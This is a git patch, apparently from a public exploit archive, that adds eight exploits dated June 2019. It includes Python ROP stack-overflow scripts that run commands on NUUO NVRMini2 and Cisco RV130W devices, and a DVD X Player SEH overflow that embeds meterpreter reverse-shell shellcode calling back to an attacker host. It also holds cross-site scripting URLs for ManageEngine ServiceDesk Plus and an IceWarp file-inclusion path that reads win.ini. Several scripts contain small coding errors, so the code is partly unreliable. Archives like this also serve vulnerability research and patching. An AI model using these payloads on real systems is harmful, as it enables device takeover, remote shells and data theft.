From 76be51b7d6fbd853615edc51d65bfe7ac1589e65 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 5 Jun 2019 05:01:56 +0000 Subject: [PATCH] DB: 2019-06-05 8 changes to exploits/shellcodes DVD X Player 5.5 Pro - Local Buffer Overflow (SEH) NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow Cisco RV130W 1.0.3.44 - Remote Stack Overflow IceWarp 10.4.4 - Local File Inclusion Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting --- exploits/hardware/remote/46960.py | 89 +++++++++++++++++++++++++++++++ exploits/hardware/remote/46961.py | 68 +++++++++++++++++++++++ exploits/java/webapps/46963.txt | 14 +++++ exploits/java/webapps/46964.txt | 15 ++++++ exploits/java/webapps/46965.txt | 14 +++++ exploits/java/webapps/46966.txt | 15 ++++++ exploits/php/webapps/46959.txt | 15 ++++++ exploits/windows/local/46962.py | 58 ++++++++++++++++++++ files_exploits.csv | 8 +++ 9 files changed, 296 insertions(+) create mode 100755 exploits/hardware/remote/46960.py create mode 100755 exploits/hardware/remote/46961.py create mode 100644 exploits/java/webapps/46963.txt create mode 100644 exploits/java/webapps/46964.txt create mode 100644 exploits/java/webapps/46965.txt create mode 100644 exploits/java/webapps/46966.txt create mode 100644 exploits/php/webapps/46959.txt create mode 100755 exploits/windows/local/46962.py diff --git a/exploits/hardware/remote/46960.py b/exploits/hardware/remote/46960.py new file mode 100755 index 000000000..def3ea743 --- /dev/null +++ b/exploits/hardware/remote/46960.py @@ -0,0 +1,89 @@ +#!/usr/bin/python +# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow +# Google Dork: n/a +# Date: Advisory Published: Nov 18 +# Exploit Author: @0x00string +# Vendor Homepage: nuuo.com +# Software Link: https://www.nuuo.com/ProductNode.php?node=2 +# Version: 3.9.1 and prior +# Tested on: 3.9.1 +# CVE : CVE-2018-19864 +# +# [ leading / ] +# [ Padding x 335 ] +# [ original value at stack pointer + 158 ] +# [ padding x 80 ] +# [ address of (pop {r3,lr} ; bx lr) ] +# [ system() address ] +# [ address of (mov r0,sp ; blx r3) ] +# [ command to execute ] + +def banner(): + print ''' + @0x00string + 0000000000000 + 0000000000000000000 00 + 00000000000000000000000000000 + 0000000000000000000000000000000 + 000000000 0000000000 + 00000000 0000000000 + 0000000 000000000000 + 0000000 000000000000000 + 000000 000000000 000000 +0000000 000000000 000000 +000000 000000000 000000 +000000 000000000 000000 +000000 00000000 000000 +000000 000000000 000000 +0000000 000000000 0000000 + 000000 000000000 000000 + 0000000000000000 0000000 + 0000000000000 0000000 + 00000000000 00000000 + 00000000000 000000000 + 0000000000000000000000000000000 + 00000000000000000000000000000 + 000 0000000000000000000 + 0000000000000 +https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py +''' + +def usage (): + print ("python script.py \n" + " -h, --help: Show this message\n" + " -a, --rhost: Target IP address\n" + " -b, --rport: Target Port - default 5150\n" + " -c, --command: Command to execute\n" + "\n" + "Example:\n" + "python script.py -a 10.10.10.10\n" + "python script.py -a 10.10.10.10 -b 1234 -c reboot\n") + exit() + +def main(): + rhost = None; + rport = "5150"; + command = "{/bin/touch,/tmp/hax}" + banner() + options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help']) + for opt, arg in options: + if opt in ('-h', '--help'): + usage() + elif opt in ('-a','--rhost'): + rhost = arg; + elif opt in ('-b','--rport'): + rport = arg; + elif opt in ('-c','--command'): + command = arg; + print ("Sending exploit to execute [" + command + "]\n") + buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" + + "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " + + "http://" + rhost + ":" + rport + "\r\n\r\n" + sock = socket(AF_INET, SOCK_STREAM) + sock.settimeout(30) + sock.connect((target_ip,int(target_port))) + sock.send(buf) + print ("done\n") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/hardware/remote/46961.py b/exploits/hardware/remote/46961.py new file mode 100755 index 000000000..0297a21ef --- /dev/null +++ b/exploits/hardware/remote/46961.py @@ -0,0 +1,68 @@ +#!/usr/bin/python +# Exploit Title: Cisco RV130W Remote Stack Overflow +# Google Dork: n/a +# Date: Advisory Published: Feb 2019 +# Exploit Author: @0x00string +# Vendor Homepage: cisco.com +# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html +# Version: 1.0.3.44 and prior +# Tested on: 1.0.3.44 +# CVE : CVE-2019-1663 +# +# 0x357fc000 - libc base addr +# 0x35849144 - system() addr +# +# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr; +# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}; +# 0x00041308 / 0x3583D308: mov r0, sp; blx r2; +# +# gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text +# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command] +# +# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi' + +#!/usr/bin/python +import requests + +def banner(): + print ''' + @0x00string + 0000000000000 + 0000000000000000000 00 + 00000000000000000000000000000 + 0000000000000000000000000000000 + 000000000 0000000000 + 00000000 0000000000 + 0000000 000000000000 + 0000000 000000000000000 + 000000 000000000 000000 +0000000 000000000 000000 +000000 000000000 000000 +000000 000000000 000000 +000000 00000000 000000 +000000 000000000 000000 +0000000 000000000 0000000 + 000000 000000000 000000 + 0000000000000000 0000000 + 0000000000000 0000000 + 00000000000 00000000 + 00000000000 000000000 + 0000000000000000000000000000000 + 00000000000000000000000000000 + 000 0000000000000000000 + 0000000000000 +https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py +''' + +def main(): + banner() + command = "ping 192.168.1.100\x00" + print ("Sending exploit to execute [" + command + "]\n") + rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35" + payload = ("Z" * 446) + rop + command + url = "https://192.168.1.100:443/login.cgi" + data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'} + r = requests.post(url, payload=data) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/java/webapps/46963.txt b/exploits/java/webapps/46963.txt new file mode 100644 index 000000000..4e91540d1 --- /dev/null +++ b/exploits/java/webapps/46963.txt @@ -0,0 +1,14 @@ +# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do +# Date: 2019-06-04 +# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) +# Vendor Homepage: https://www.manageengine.com/products/service-desk +# Version: Zoho ManageEngine ServiceDesk Plus 9.3 +# CVE : CVE-2019-12538 + + +Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter + + +Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME= + +PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view \ No newline at end of file diff --git a/exploits/java/webapps/46964.txt b/exploits/java/webapps/46964.txt new file mode 100644 index 000000000..b26cefbdb --- /dev/null +++ b/exploits/java/webapps/46964.txt @@ -0,0 +1,15 @@ +# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do +# Date: 2019-06-04 +# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) +# Vendor Homepage: https://www.manageengine.com/products/service-desk +# Version: Zoho ManageEngine ServiceDesk Plus 9.3 +# CVE : CVE-2019-12541 + + +Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter. + + +Attack vector: domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions + + +PoC: https://drive.google.com/file/d/1zXyFpVwAPc0MfcERNmvIdyKLzx0JMA9r/view \ No newline at end of file diff --git a/exploits/java/webapps/46965.txt b/exploits/java/webapps/46965.txt new file mode 100644 index 000000000..48bc3279a --- /dev/null +++ b/exploits/java/webapps/46965.txt @@ -0,0 +1,14 @@ +# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do +# Date: 2019-06-04 +# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) +# Vendor Homepage: https://www.manageengine.com/products/service-desk +# Version: Zoho ManageEngine ServiceDesk Plus 9.3 +# CVE : CVE-2019-12542 + + +An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter. + + +Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol">qzmm3u7id8z&selectName=Site + +PoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view \ No newline at end of file diff --git a/exploits/java/webapps/46966.txt b/exploits/java/webapps/46966.txt new file mode 100644 index 000000000..1f2c33ff1 --- /dev/null +++ b/exploits/java/webapps/46966.txt @@ -0,0 +1,15 @@ +# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do +# Date: 2019-06-04 +# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) +# Vendor Homepage: https://www.manageengine.com/products/service-desk +# Version: Zoho ManageEngine ServiceDesk Plus 9.3 +# CVE : CVE-2019-12543 + + +Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter. + + +Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl + + +PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view \ No newline at end of file diff --git a/exploits/php/webapps/46959.txt b/exploits/php/webapps/46959.txt new file mode 100644 index 000000000..8c2acb382 --- /dev/null +++ b/exploits/php/webapps/46959.txt @@ -0,0 +1,15 @@ +# Exploit Title: IceWarp <=10.4.4 local file include +# Date: 02/06/2019 +# Exploit Author: JameelNabbo +# Website: uitsec.com +# Vendor Homepage: http://www.icewarp.com +# Software Link: https://www.icewarp.com/downloads/trial/ +# Version: 10.4.4 +# Tested on: Windows 10 +# CVE: CVE-2019-12593 +POC: + +http://example.com/webmail/calendar/minimizer/index.php?style=[LFI] + +Example: +http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini \ No newline at end of file diff --git a/exploits/windows/local/46962.py b/exploits/windows/local/46962.py new file mode 100755 index 000000000..864be5c18 --- /dev/null +++ b/exploits/windows/local/46962.py @@ -0,0 +1,58 @@ +# Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH +# Date: 6-3-2019 +# Exploit Author: Kevin Randall +# Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer +# Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer +# Version: 5.5 Pro +# Tested on: Windows 7 +# CVE : N/A + +#!/usr/bin/python +###########Create Shellcode with MSFVenom############################################################################################### +##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python +######################################################################################################################################## +file_name = "payloadofficial.plf" + +#######################Copy and Paste Shellcode Here!!########################### +buf = "" +buf += "\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b" +buf += "\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c" +buf += "\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc" +buf += "\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc" +buf += "\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27" +buf += "\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23" +buf += "\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a" +buf += "\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99" +buf += "\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92" +buf += "\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f" +buf += "\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf" +buf += "\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46" +buf += "\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad" +buf += "\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c" +buf += "\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e" +buf += "\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7" +buf += "\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54" +buf += "\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf" +buf += "\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef" +buf += "\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80" +buf += "\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f" +buf += "\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b" +buf += "\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78" +buf += "\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21" +buf += "\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c" +buf += "\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2" +buf += "\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12" +buf += "\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37" +buf += "\x49\x21\x39\x12" +################################################################################# + +#No Operations# +nops = "\x90"*20 +shellcode = nops + buf + +####Where all the magic happens! :)##################################################################### +buffer = "A"* 608 + "\xEB\x06\x90\x90" + "\x2E\x17\x64\x61" + shellcode + "D"*(1384-len(shellcode)) +################################################################################################### +plf_file = open(file_name,"w") +plf_file.write(buffer) +plf_file.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 03a8e77fe..651a09ebe 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10537,6 +10537,7 @@ id,file,description,date,author,type,platform,port 46933,exploits/android/local/46933.txt,"EquityPandit 1.0 - Password Disclosure",2019-05-28,ManhNho,local,android, 46938,exploits/windows/local/46938.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)",2019-05-23,SandboxEscaper,local,windows, 46945,exploits/windows/local/46945.cpp,"Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)",2014-11-24,anonymous,local,windows, +46962,exploits/windows/local/46962.py,"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)",2019-06-04,"Kevin Randall",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17477,6 +17478,8 @@ id,file,description,date,author,type,platform,port 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos, 46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows, 46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java, +46960,exploits/hardware/remote/46960.py,"NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow",2019-06-04,@0x00string,remote,hardware, +46961,exploits/hardware/remote/46961.py,"Cisco RV130W 1.0.3.44 - Remote Stack Overflow",2019-06-04,@0x00string,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41367,3 +41370,8 @@ id,file,description,date,author,type,platform,port 46956,exploits/php/webapps/46956.txt,"KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities",2019-06-03,SlidingWindow,webapps,php, 46957,exploits/hardware/webapps/46957.txt,"AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control",2019-06-03,Luca.Chiou,webapps,hardware, 46958,exploits/php/webapps/46958.txt,"WordPress Plugin Form Maker 1.13.3 - SQL Injection",2019-06-03,"Daniele Scanu",webapps,php, +46959,exploits/php/webapps/46959.txt,"IceWarp 10.4.4 - Local File Inclusion",2019-06-04,JameelNabbo,webapps,php, +46963,exploits/java/webapps/46963.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java, +46964,exploits/java/webapps/46964.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java, +46965,exploits/java/webapps/46965.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java, +46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,